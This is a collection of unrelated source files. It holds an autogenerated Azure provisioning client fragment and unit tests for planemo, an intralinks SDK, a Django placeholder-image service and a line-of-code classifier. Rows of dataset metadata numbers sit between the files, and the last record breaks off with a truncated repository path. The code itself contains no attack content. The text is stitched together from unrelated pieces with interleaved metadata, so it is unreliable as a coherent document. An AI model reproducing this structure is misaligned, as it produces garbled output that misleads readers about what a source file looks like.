custom_headers=None,
raw=False,
**operation_config
):
"""Query the device enrollment groups.
:param query_specification: The query specification.
:type query_specification: ~protocol.models.QuerySpecification
:param x_ms_max_item_count: pageSize
:type x_ms_max_item_count: int
:param x_ms_continuation: continuation token
:type x_ms_continuation: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: list or ClientRawResponse if raw=true
:rtype: list[~protocol.models.EnrollmentGroup] or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`ProvisioningServiceErrorDetailsException<protocol.models.ProvisioningServiceErrorDetailsException>`
"""
# Construct URL
url = self.query_enrollment_groups.metadata["url"]
# Construct parameters
query_parameters = {}
query_parameters["api-version"] = self._serialize.query(
"self.api_version", self.api_version, "str"
)
# Construct headers
header_parameters = {}
header_parameters["Accept"] = "application/json"
header_parameters["Content-Type"] = "application/json; charset=utf-8"
if custom_headers:
header_parameters.update(custom_headers)
if x_ms_max_item_count is not None:
header_parameters["x-ms-max-item-count"] = self._serialize.header(
"x_ms_max_item_count", x_ms_max_item_count, "int"
)
if x_ms_continuation is not None:
header_parameters["x-ms-continuation"] = self._serialize.header(
"x_ms_continuation", x_ms_continuation, "str"
)
# Construct body
body_content = self._serialize.body(query_specification, "QuerySpecification")
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ProvisioningServiceErrorDetailsException(self._deserialize, response)
deserialized = None
header_dict = {}
if response.status_code == 200:
deserialized = self._deserialize("[EnrollmentGroup]", response)
header_dict = {
"x-ms-continuation": "str",
"x-ms-max-item-count": "int",
"x-ms-item-type": "str",
}
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
client_raw_response.add_headers(header_dict)
return client_raw_response
return deserialized
query_enrollment_groups.metadata = {"url": "/enrollmentGroups/query"}
def get_enrollment_group_attestation_mechanism(
self, id, custom_headers=None, raw=False, **operation_config
):
"""Get the attestation mechanism in the device enrollment group record.
:param id: Enrollment group ID
:type id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: AttestationMechanism or ClientRawResponse if raw=true
:rtype: ~protocol.models.AttestationMechanism or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`ProvisioningServiceErrorDetailsException<protocol.models.ProvisioningServiceErrorDetailsException>`
"""
# Construct URL
url = self.get_enrollment_group_attestation_mechanism.metadata["url"]
path_format_arguments = {"id": self._serialize.url("id", id, "str")}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters["api-version"] = self._serialize.query(
"self.api_version", self.api_version, "str"
)
# Construct headers
header_parameters = {}
header_parameters["Accept"] = "application/json"
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ProvisioningServiceErrorDetailsException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize("AttestationMechanism", response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_enrollment_group_attestation_mechanism.metadata = {
"url": "/enrollmentGroups/{id}/attestationmechanism"
}
def query_device_registration_states(
self, id, custom_headers=None, raw=False, **operation_config
):
"""Gets the registration state of devices in this enrollmentGroup.
:param id: Enrollment group ID.
:type id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: list or ClientRawResponse if raw=true
:rtype: list[~protocol.models.DeviceRegistrationState] or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`ProvisioningServiceErrorDetailsException<protocol.models.ProvisioningServiceErrorDetailsException>`
"""
# Construct URL
url = self.query_device_registration_states.metadata["url"]
path_format_arguments = {"id": self._serialize.url("id", id, "str")}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters["api-version"] = self._serialize.query(
"self.api_version", self.api_version, "str"
)
# Construct headers
header_parameters = {}
header_parameters["Accept"] = "application/json"
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ProvisioningServiceErrorDetailsException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize("[DeviceRegistrationState]", response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
query_device_registration_states.metadata = {"url": "/registrations/{id}/query"}
| 40.361915
| 116
| 0.671099
| 3,646
| 36,245
| 6.459956
| 0.052935
| 0.045514
| 0.021653
| 0.021229
| 0.904683
| 0.892795
| 0.887063
| 0.870675
| 0.862862
| 0.86248
| 0
| 0.003236
| 0.241192
| 36,245
| 897
| 117
| 40.406912
| 0.853143
| 0.316982
| 0
| 0.770302
| 1
| 0
| 0.093615
| 0.015057
| 0
| 0
| 0
| 0
| 0
| 1
| 0.037123
| false
| 0
| 0.011601
| 0
| 0.111369
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
17cb65026e91ab819e5e04fdf6f7ec4a60c4e4b9
| 5,144
|
py
|
Python
|
tests/test_cmd_training_init.py
|
pvanheus/planemo
|
12c4256325bb1b274dcd40d64b91c1f832cf49b1
|
[
"CC-BY-3.0"
] | 73
|
2015-01-03T15:09:26.000Z
|
2022-03-30T23:52:55.000Z
|
tests/test_cmd_training_init.py
|
pvanheus/planemo
|
12c4256325bb1b274dcd40d64b91c1f832cf49b1
|
[
"CC-BY-3.0"
] | 958
|
2015-01-02T08:27:45.000Z
|
2022-03-23T14:51:51.000Z
|
tests/test_cmd_training_init.py
|
jmchilton/planemo
|
d352a085fe10cb6b7c1384663b114201da42d97b
|
[
"CC-BY-3.0"
] | 84
|
2015-01-06T18:27:28.000Z
|
2021-11-18T01:58:17.000Z
|
"""Tests for the ``training_init`` command."""
import os
from .test_utils import (
CliTestCase,
skip_if_environ,
TEST_DATA_DIR
)
class CmdTrainingInitTestCase(CliTestCase):
"""Container class defining test cases for the ``training_init`` command."""
@skip_if_environ("PLANEMO_SKIP_GALAXY_TESTS")
def test_training_init_command_by_default(self):
"""Test training_init command with only topic name."""
with self._isolate():
training_init_command = [
"training_init",
"--topic_name", "test"
]
self._check_exit_code(training_init_command, exit_code=0)
@skip_if_environ("PLANEMO_SKIP_GALAXY_TESTS")
def test_training_init_command_topic(self):
"""Test training_init command to create new topic."""
with self._isolate():
# working test
training_init_command = [
"training_init",
"--topic_name", "test",
"--topic_title", "Topic title",
"--topic_target", "use",
"--topic_summary", "Summary"
]
self._check_exit_code(training_init_command, exit_code=0)
# failing test
training_init_command = [
"training_init",
"--topic_name", "test",
"--topic_title", "Topic title",
"--topic_target", "test",
"--topic_summary", "Summary"
]
self._check_exit_code(training_init_command, exit_code=2)
@skip_if_environ("PLANEMO_SKIP_GALAXY_TESTS")
def test_training_init_command_tutorial_no_topic(self):
"""Test training_init command with tutorial but no topic."""
with self._isolate():
# working test
training_init_command = [
"training_init",
"--tutorial_name", "test"
]
self._check_exit_code(training_init_command, exit_code=2)
@skip_if_environ("PLANEMO_SKIP_GALAXY_TESTS")
def test_training_init_command_tutorial(self):
"""Test training_init command to create new tutorial."""
with self._isolate():
# working test
training_init_command = [
"training_init",
"--topic_name", "test",
"--tutorial_name", "test",
"--tutorial_title", "Title of the tutorial",
"--hands_on",
"--slides"
]
self._check_exit_code(training_init_command, exit_code=0)
@skip_if_environ("PLANEMO_SKIP_GALAXY_TESTS")
def test_training_init_command_tutorial_zenodo(self):
"""Test training_init command to create new tutorial with zenodo."""
with self._isolate():
datatype = os.path.join(TEST_DATA_DIR, "training_datatypes.yaml")
# not working test
training_init_command = [
"training_init",
"--topic_name", "test",
"--tutorial_name", "test",
"--zenodo_link", "https://zenodo.org/record/1321885"
]
self._check_exit_code(training_init_command, exit_code=1)
# working
training_init_command = [
"training_init",
"--topic_name", "test",
"--tutorial_name", "test",
"--zenodo_link", "https://zenodo.org/record/1321885",
"--datatypes", datatype
]
self._check_exit_code(training_init_command, exit_code=0)
@skip_if_environ("PLANEMO_SKIP_GALAXY_TESTS")
def test_training_init_command_tutorial_local_wf(self):
"""Test training_init command to create new tutorial with local workflow."""
with self._isolate():
test_workflow = os.path.join(TEST_DATA_DIR, "test_workflow_1.ga")
# working test
training_init_command = [
"training_init",
"--topic_name", "test",
"--tutorial_name", "test",
"--workflow", test_workflow
]
self._check_exit_code(training_init_command, exit_code=0)
@skip_if_environ("PLANEMO_SKIP_GALAXY_TESTS")
def test_training_init_command_tutorial_remote_wf(self):
"""Test training_init command to create new tutorial with workflow on running instance."""
with self._isolate():
# not working test
training_init_command = [
"training_init",
"--topic_name", "test",
"--tutorial_name", "test",
"--workflow_id", "ID"
]
self._check_exit_code(training_init_command, exit_code=1)
# working test
training_init_command = [
"training_init",
"--topic_name", "test",
"--tutorial_name", "test",
"--workflow_id", "ID",
"--galaxy_url", "https://usegalaxy.eu/",
"--galaxy_api_key", "API"
]
self._check_exit_code(training_init_command, exit_code=0)
| 38.969697
| 98
| 0.566291
| 528
| 5,144
| 5.096591
| 0.151515
| 0.205128
| 0.254181
| 0.188034
| 0.819398
| 0.800818
| 0.758454
| 0.758454
| 0.730955
| 0.730955
| 0
| 0.007196
| 0.32465
| 5,144
| 131
| 99
| 39.267176
| 0.767415
| 0.127138
| 0
| 0.601942
| 0
| 0
| 0.225428
| 0.044635
| 0
| 0
| 0
| 0
| 0
| 1
| 0.067961
| false
| 0
| 0.019417
| 0
| 0.097087
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
17dcdec873c4fdf82972b1527550010a61eb050d
| 329
|
py
|
Python
|
intralinks_test/folders_v1_test.py
|
ilapi/intralinks-sdk-python
|
dcf789d874d907833aa48557309c3e12e4703a4e
|
[
"MIT"
] | 3
|
2019-02-28T14:46:54.000Z
|
2021-01-07T22:41:35.000Z
|
intralinks_test/folders_v1_test.py
|
ilapi/intralinks-sdk-python
|
dcf789d874d907833aa48557309c3e12e4703a4e
|
[
"MIT"
] | 5
|
2018-12-12T10:08:18.000Z
|
2018-12-17T13:45:56.000Z
|
intralinks_test/folders_v1_test.py
|
ilapi/intralinks-sdk-python
|
dcf789d874d907833aa48557309c3e12e4703a4e
|
[
"MIT"
] | 1
|
2019-02-28T14:46:35.000Z
|
2019-02-28T14:46:35.000Z
|
import intralinks_test.folders_helper
def test_create_update_delete_folder(v1_client, test_data):
intralinks_test.folders_helper.test_create_update_delete_folder(v1_client, test_data)
def test_create_delete_folders(v1_client, test_data):
intralinks_test.folders_helper.test_create_delete_folders(v1_client, test_data)
| 36.555556
| 89
| 0.87234
| 49
| 329
| 5.285714
| 0.265306
| 0.15444
| 0.185328
| 0.247104
| 0.849421
| 0.849421
| 0.849421
| 0.849421
| 0.648649
| 0.409266
| 0
| 0.013072
| 0.069909
| 329
| 8
| 90
| 41.125
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0
| 0.2
| 0
| 0.6
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 9
|
aa0237b07590a463d2615713d0d72face783ab1b
| 13,794
|
py
|
Python
|
mysite/test.py
|
amid-africa/placeholder
|
0333e469a44eadeee2e90b68dd31e676072905cd
|
[
"MIT"
] | null | null | null |
mysite/test.py
|
amid-africa/placeholder
|
0333e469a44eadeee2e90b68dd31e676072905cd
|
[
"MIT"
] | 5
|
2019-03-20T07:51:37.000Z
|
2022-01-13T01:08:12.000Z
|
mysite/test.py
|
amid-africa/placeholder
|
0333e469a44eadeee2e90b68dd31e676072905cd
|
[
"MIT"
] | 1
|
2019-03-29T11:23:12.000Z
|
2019-03-29T11:23:12.000Z
|
import unittest
from django.test import Client
from PIL import ImageFile
class SimpleTest(unittest.TestCase):
def setUp(self):
# Every test needs a client.
self.client = Client()
# As we are dealing with images responses
self.parser = ImageFile.Parser()
def test_home(self):
# Issue a GET request to the home page.
response = self.client.get('')
# Check that the response is 200 OK.
self.assertEqual(response.status_code, 200)
""" Testing the url with only the width provided
Must be in the range 1 to 1920
Must be PNG
Must be sized 200 x 200
Must be RGB format """
def test_placeholder_width_only(self):
# Supply a width only in allowed range.
response = self.client.get('/200/')
# Check that the response is 200 OK.
self.assertEqual(response.status_code, 200)
# Check the response is a png
self.assertEqual("image/png", response['Content-Type'])
# Feed the image Parser and check the width, height and mode.
self.parser.feed(response.content)
self.assertEqual(self.parser.image.size[0], 200)
self.assertEqual(self.parser.image.size[1], 200)
self.assertEqual(self.parser.image.mode, 'RGB')
""" Testing width only incorrect values return a 404 """
def test_fail_placeholder_width_only(self):
# Supply a rubbish width and response is 404, not found
response = self.client.get('/ffffff/')
self.assertEqual(response.status_code, 404)
# Supply 0px width and response is 404, not found
response = self.client.get('/0/')
self.assertEqual(response.status_code, 404)
# Supply 1921 width and response is 404, not found
response = self.client.get('/1921/')
self.assertEqual(response.status_code, 404)
""" Testing the url with the width and height provided
Width must be in the range 1 to 1920
Height must be in the range 1 to 1080
Must be PNG
Must be sized 600 x 400
Must be RGB format """
def test_placeholder_width_height(self):
# Supply a width only in allowed range.
response = self.client.get('/600/400/')
# Check that the response is 200 OK.
self.assertEqual(response.status_code, 200)
# Check the response is a png
self.assertEqual("image/png", response['Content-Type'])
# Feed the image Parser and check the width, height and mode.
self.parser.feed(response.content)
self.assertEqual(self.parser.image.size[0], 600)
self.assertEqual(self.parser.image.size[1], 400)
self.assertEqual(self.parser.image.mode, 'RGB')
""" Testing width and height incorrect values return a 404 """
def test_fail_placeholder_width_height(self):
# Supply a rubbish width and height and response is 404, not found
response = self.client.get('/rubbish/rubbish/')
self.assertEqual(response.status_code, 404)
# Supply a rubbish width and good height and response is 404, not found
response = self.client.get('/rubbish/600/')
self.assertEqual(response.status_code, 404)
# Supply a good width and rubbish height and response is 404, not found
response = self.client.get('/400/rubbish/')
self.assertEqual(response.status_code, 404)
# Supply 0px width and 0px height response is 404, not found
response = self.client.get('/0/0/')
self.assertEqual(response.status_code, 404)
# Supply 0px width and good height response is 404, not found
response = self.client.get('/0/400/')
self.assertEqual(response.status_code, 404)
# Supply good width and 0px height response is 404, not found
response = self.client.get('/400/0/')
self.assertEqual(response.status_code, 404)
# Supply 1921 width and 1081 height and response is 404, not found
response = self.client.get('/1921/1081/')
self.assertEqual(response.status_code, 404)
# Supply good width and 1081 height and response is 404, not found
response = self.client.get('/400/1081/')
self.assertEqual(response.status_code, 404)
# Supply 1921 width and good height and response is 404, not found
response = self.client.get('/1921/400/')
self.assertEqual(response.status_code, 404)
""" Testing the url with the background color provided
Must be PNG
Must be RGB format """
def test_placeholder_background(self):
# Supply a width only in allowed range and color in allowed range
response = self.client.get('/200/aabbcc/')
# Check that the response is 200 OK.
self.assertEqual(response.status_code, 200)
# Check the response is a png
self.assertEqual("image/png", response['Content-Type'])
# Feed the image Parser and check the mode.
self.parser.feed(response.content)
self.assertEqual(self.parser.image.mode, 'RGB')
# Supply a width and height in allowed range and color in allowed range
response = self.client.get('/200/400/11ffaa/')
# Check that the response is 200 OK.
self.assertEqual(response.status_code, 200)
# Check the response is a png
self.assertEqual("image/png", response['Content-Type'])
# Feed the image Parser and check the mode.
self.parser.feed(response.content)
self.assertEqual(self.parser.image.mode, 'RGB')
""" Testing background incorrect values return a 404 """
def test_fail_placeholder_background(self):
# Supply good width and good height and short color, response is 404, not found
response = self.client.get('/200/400/fff/')
self.assertEqual(response.status_code, 404)
# Supply good width and good height and rubish color, response is 404, not found
response = self.client.get('/200/400/rubish/')
self.assertEqual(response.status_code, 404)
# Supply good dimensions and long color hex, response is 404, not found
response = self.client.get('/200/400/aabbccd/')
self.assertEqual(response.status_code, 404)
# Supply good dimensions and long color over hex values, response is 404, not found
response = self.client.get('/200/400/gggggg/')
self.assertEqual(response.status_code, 404)
""" Testing the url with the background and foreground colors provided
Must be PNG
Must be RGB format """
def test_placeholder_background_foreground(self):
# Supply a width only in allowed range and color in allowed range
response = self.client.get('/200/123456/789abc/')
# Check that the response is 200 OK.
self.assertEqual(response.status_code, 200)
# Check the response is a png
self.assertEqual("image/png", response['Content-Type'])
# Feed the image Parser and check the mode.
self.parser.feed(response.content)
self.assertEqual(self.parser.image.mode, 'RGB')
# Supply a width and height in allowed range and colors in allowed range
response = self.client.get('/200/400/11ffaa/0055cc/')
# Check that the response is 200 OK.
self.assertEqual(response.status_code, 200)
# Check the response is a png
self.assertEqual("image/png", response['Content-Type'])
# Feed the image Parser and check the mode.
self.parser.feed(response.content)
self.assertEqual(self.parser.image.mode, 'RGB')
""" Testing background incorrect values return a 404 """
def test_fail_placeholder_background_foreground(self):
# Supply good dimensions and short colors response is 404, not found
response = self.client.get('/200/400/fff/fff/')
self.assertEqual(response.status_code, 404)
# Supply good dimensions and good background and short foreground response is 404, not found
response = self.client.get('/200/400/112233/fff/')
self.assertEqual(response.status_code, 404)
# Supply good dimensions and rubish colors response is 404, not found
response = self.client.get('/200/400/rubish/rubish/')
self.assertEqual(response.status_code, 404)
# Supply good dimensions and foreground and rubish background colors response is 404, not found
response = self.client.get('/200/400/acacac/rubish/')
self.assertEqual(response.status_code, 404)
""" Testing the url with the format provided
Must match format
Must be RGB format """
def test_placeholder_format(self):
# Supply a width only and format in allowed formats
response = self.client.get('/200/png/')
# Check that the response is 200 OK.
self.assertEqual(response.status_code, 200)
# Check the response is a png
self.assertEqual("image/png", response['Content-Type'].lower())
# Feed the image Parser and check the mode.
self.parser.feed(response.content)
self.assertEqual(self.parser.image.mode, 'RGB')
# Supply with dimension and format in allowed
response = self.client.get('/200/400/jpg/')
# Check that the response is 200 OK.
self.assertEqual(response.status_code, 200)
# Check the response is a JPEG
self.assertEqual("image/jpeg", response['Content-Type'].lower())
# Feed the image Parser and check the mode.
self.parser.feed(response.content)
self.assertEqual(self.parser.image.mode, 'RGB')
# Supply with dimension and background color and format in allowed
response = self.client.get('/200/400/ffffff/jpeg/')
# Check that the response is 200 OK.
self.assertEqual(response.status_code, 200)
# Check the response is a JPEG
self.assertEqual("image/jpeg", response['Content-Type'].lower())
# Feed the image Parser and check the mode.
self.parser.feed(response.content)
self.assertEqual(self.parser.image.mode, 'RGB')
# Supply with dimension and colors and format in allowed
response = self.client.get('/200/400/ffffff/000000/pcx/')
# Check that the response is 200 OK.
self.assertEqual(response.status_code, 200)
# Check the response is a JPEG
self.assertEqual("image/pcx", response['Content-Type'].lower())
# Feed the image Parser and check the mode.
self.parser.feed(response.content)
self.assertEqual(self.parser.image.mode, 'RGB')
# Supply with width and colors and format in allowed
response = self.client.get('/200/ffffff/000000/gif/')
# Check that the response is 200 OK.
self.assertEqual(response.status_code, 200)
# Check the response is a JPEG
self.assertEqual("image/gif", response['Content-Type'].lower())
# Feed the image Parser and check the mode.
self.parser.feed(response.content)
self.assertEqual(self.parser.image.mode, 'RGB')
# Supply with width and background color and format in allowed
response = self.client.get('/200/ffffff/bmp/')
# Check that the response is 200 OK.
self.assertEqual(response.status_code, 200)
# Check the response is a JPEG
self.assertEqual("image/bmp", response['Content-Type'].lower())
# Feed the image Parser and check the mode.
self.parser.feed(response.content)
self.assertEqual(self.parser.image.mode, 'RGB')
""" Testing format incorrect values return a 404 """
def test_fail_placeholder_format(self):
# Supply good dimensions and good colors with rubbish format, response is 404, not found
response = self.client.get('/200/400/ffffff/000000/rubbish/')
self.assertEqual(response.status_code, 404)
# Supply good dimensions and good colors with unsuported format, response is 404, not found
response = self.client.get('/200/400/ffffff/000000/tiff/')
self.assertEqual(response.status_code, 404)
""" To improve coverage, test cases that are not normall """
def test_unusual_dimensions(self):
# Supply very small dimensions, stops text from appearing.
response = self.client.get('/10/15/')
# Check that the response is 200 OK.
self.assertEqual(response.status_code, 200)
# Check the response is a png
self.assertEqual("image/png", response['Content-Type'])
# Feed the image Parser and check the width, height and mode.
self.parser.feed(response.content)
self.assertEqual(self.parser.image.size[0], 10)
self.assertEqual(self.parser.image.size[1], 15)
self.assertEqual(self.parser.image.mode, 'RGB')
# Make second line text shorter than first line
response = self.client.get('/100/150/?text=x')
# Check that the response is 200 OK.
self.assertEqual(response.status_code, 200)
# Check the response is a png
self.assertEqual("image/png", response['Content-Type'])
# Feed the image Parser and check the width, height and mode.
self.parser.feed(response.content)
self.assertEqual(self.parser.image.mode, 'RGB')
# Make second line text blank
response = self.client.get('/100/150/?text=')
# Check that the response is 200 OK.
self.assertEqual(response.status_code, 200)
# Check the response is a png
self.assertEqual("image/png", response['Content-Type'])
# Feed the image Parser and check the width, height and mode.
self.parser.feed(response.content)
self.assertEqual(self.parser.image.mode, 'RGB')
| 39.982609
| 103
| 0.658402
| 1,843
| 13,794
| 4.888768
| 0.074878
| 0.123196
| 0.075916
| 0.088568
| 0.901443
| 0.890122
| 0.873918
| 0.83818
| 0.810766
| 0.794673
| 0
| 0.051545
| 0.244744
| 13,794
| 344
| 104
| 40.098837
| 0.813304
| 0.300638
| 0
| 0.541096
| 0
| 0
| 0.106794
| 0.023431
| 0
| 0
| 0
| 0
| 0.506849
| 1
| 0.089041
| false
| 0
| 0.020548
| 0
| 0.116438
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a4bf19ae9a7b265529da727d4b5cd576331ab710
| 7,634
|
py
|
Python
|
tests/cloc/test_classification_description_selection.py
|
oliverhulett/classify-lines-of-code
|
6ca0d902ebe1ff858d053ce1a98bd47ededb3f1c
|
[
"Apache-2.0"
] | null | null | null |
tests/cloc/test_classification_description_selection.py
|
oliverhulett/classify-lines-of-code
|
6ca0d902ebe1ff858d053ce1a98bd47ededb3f1c
|
[
"Apache-2.0"
] | 4
|
2018-03-08T02:52:29.000Z
|
2018-05-07T23:30:18.000Z
|
tests/cloc/test_classification_description_selection.py
|
oliverhulett/classify-lines-of-code
|
6ca0d902ebe1ff858d053ce1a98bd47ededb3f1c
|
[
"Apache-2.0"
] | null | null | null |
"""
Created on 3 Mar. 2018
@author: oliver
"""
import sys
import unittest2 as unittest
from cloc.classification_description import ClassificationDescription, Matcher
class TestClassificationDescription(unittest.TestCase):
def setUp(self):
self.maxDiff = None
self.description = ClassificationDescription()
self.description.add_descriptions(
{
"top-level-1": {
"path_regex": "path-regex-1",
"line_regex": "line-regex-1",
"classifications": ["classification-1"],
},
"top-level-2": {
"path_regex": "path-regex-2",
"entry_regex": "entry-regex-2",
"exit_regex": "exit-regex-2",
"classifications": ["classification-2"],
},
"top-level-3": {
"path_regex": "path-regex-3",
"entry_regex": "entry-regex-3",
"exit_regex": "exit-regex-3",
"classifications": ["classification-3"],
"subsections": {
"nested-1": {"line_regex": "line-regex-3-1", "classifications": ["classification-3-1"]},
"nested-2": {
"entry_regex": "entry-regex-3-2",
"exit_regex": "exit-regex-3-2",
"classifications": ["classification-3-2"],
},
},
},
}
)
self.matchers = {
"top-level-1": {
"line": Matcher(Matcher.RE_TYPE_LINE, ["top-level-1"], "line-regex-1", ["classification-1"])
},
"top-level-2": {
"entry": Matcher(Matcher.RE_TYPE_ENTRY, ["top-level-2"], "entry-regex-2", ["classification-2"]),
"exit": Matcher(Matcher.RE_TYPE_EXIT, ["top-level-2"], "exit-regex-2", ["classification-2"]),
},
"top-level-3": {
"entry": Matcher(Matcher.RE_TYPE_ENTRY, ["top-level-3"], "entry-regex-3", ["classification-3"]),
"exit": Matcher(Matcher.RE_TYPE_EXIT, ["top-level-3"], "exit-regex-3", ["classification-3"]),
"nested-1": {
"line": Matcher(
Matcher.RE_TYPE_LINE, ["top-level-3", "nested-1"], "line-regex-3-1", ["classification-3-1"]
)
},
"nested-2": {
"entry": Matcher(
Matcher.RE_TYPE_ENTRY, ["top-level-3", "nested-2"], "line-regex-3-2", ["classification-3-2"]
),
"exit": Matcher(
Matcher.RE_TYPE_EXIT, ["top-level-3", "nested-2"], "line-regex-3-2", ["classification-3-2"]
),
},
},
}
def tearDown(self):
pass
def test_get_matchers_from_file_single_match(self):
matchers = self.description.get_matchers_for_file("path/to/path-regex-1")
self.assertItemsEqual(matchers, [self.matchers["top-level-1"]["line"]])
self.assertItemsEqual(matchers, self.description._active_matchers)
def test_get_matchers_from_file_multiple_matches(self):
matchers = self.description.get_matchers_for_file("path/to/path-regex-1/path-regex-2")
self.assertItemsEqual(matchers, [self.matchers["top-level-1"]["line"], self.matchers["top-level-2"]["entry"]])
self.assertItemsEqual(matchers, self.description._active_matchers)
def test_get_matchers_from_file_no_match(self):
self.description._active_matchers = [
self.matchers["top-level-1"]["line"],
self.matchers["top-level-2"]["entry"],
]
matchers = self.description.get_matchers_for_file("path/to/file")
self.assertItemsEqual(matchers, [])
self.assertItemsEqual(matchers, self.description._active_matchers)
def test_get_next_matchers_line_regex_matched(self):
self.description._active_matchers = [
self.matchers["top-level-1"]["line"],
self.matchers["top-level-2"]["entry"],
]
matchers = self.description.get_next_matchers(self.matchers["top-level-1"]["line"])
self.assertItemsEqual(matchers, self.description._active_matchers)
def test_get_next_matchers_entry_regex_matched(self):
self.description._active_matchers = [
self.matchers["top-level-1"]["line"],
self.matchers["top-level-2"]["entry"],
]
matchers = self.description.get_next_matchers(self.matchers["top-level-2"]["entry"])
self.assertItemsEqual(matchers, [self.matchers["top-level-1"]["line"], self.matchers["top-level-2"]["exit"]])
self.assertItemsEqual(matchers, self.description._active_matchers)
def test_get_next_matchers_entry_regex_with_subsections_matched(self):
self.description._active_matchers = [
self.matchers["top-level-1"]["line"],
self.matchers["top-level-3"]["entry"],
]
matchers = self.description.get_next_matchers(self.matchers["top-level-3"]["entry"])
self.assertItemsEqual(
matchers,
[
self.matchers["top-level-1"]["line"],
self.matchers["top-level-3"]["exit"],
self.matchers["top-level-3"]["nested-1"]["line"],
self.matchers["top-level-3"]["nested-2"]["entry"],
],
)
self.assertItemsEqual(matchers, self.description._active_matchers)
def test_get_next_matchers_exit_regex_matched(self):
self.description._active_matchers = [self.matchers["top-level-1"]["line"], self.matchers["top-level-2"]["exit"]]
matchers = self.description.get_next_matchers(self.matchers["top-level-2"]["exit"])
self.assertItemsEqual(matchers, [self.matchers["top-level-1"]["line"], self.matchers["top-level-2"]["entry"]])
self.assertItemsEqual(matchers, self.description._active_matchers)
def test_get_next_matchers_exit_regex_with_subsection_matched(self):
self.description._active_matchers = [
self.matchers["top-level-1"]["line"],
self.matchers["top-level-3"]["exit"],
self.matchers["top-level-3"]["nested-1"]["line"],
self.matchers["top-level-3"]["nested-2"]["entry"],
]
matchers = self.description.get_next_matchers(self.matchers["top-level-3"]["exit"])
self.assertItemsEqual(matchers, [self.matchers["top-level-1"]["line"], self.matchers["top-level-3"]["entry"]])
self.assertItemsEqual(matchers, self.description._active_matchers)
def test_get_next_matchers_multiple_entry_regexes_matched(self):
self.description._active_matchers = [
self.matchers["top-level-2"]["entry"],
self.matchers["top-level-3"]["entry"],
]
matchers = self.description.get_next_matchers(
self.matchers["top-level-2"]["entry"], self.matchers["top-level-3"]["entry"]
)
self.assertItemsEqual(
matchers,
[
self.matchers["top-level-2"]["exit"],
self.matchers["top-level-3"]["exit"],
self.matchers["top-level-3"]["nested-1"]["line"],
self.matchers["top-level-3"]["nested-2"]["entry"],
],
)
self.assertItemsEqual(matchers, self.description._active_matchers)
if __name__ == "__main__":
# import sys;sys.argv = ['', 'Test.testName']
unittest.main()
| 45.171598
| 120
| 0.566282
| 806
| 7,634
| 5.17866
| 0.083127
| 0.103498
| 0.147341
| 0.196454
| 0.81265
| 0.752995
| 0.72712
| 0.72712
| 0.725922
| 0.652611
| 0
| 0.021469
| 0.273906
| 7,634
| 168
| 121
| 45.440476
| 0.731553
| 0.011003
| 0
| 0.369863
| 0
| 0
| 0.217979
| 0.004376
| 0
| 0
| 0
| 0
| 0.116438
| 1
| 0.075342
| false
| 0.006849
| 0.020548
| 0
| 0.10274
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
35361da21c1c1e667efe578b9f6fa2f13762b3a9
| 3,461
|
py
|
Python
|
tests/test_verify.py
|
commerceblock/pymainstay
|
50987e147fd81c1e94b9dec08290cfb30076d3fd
|
[
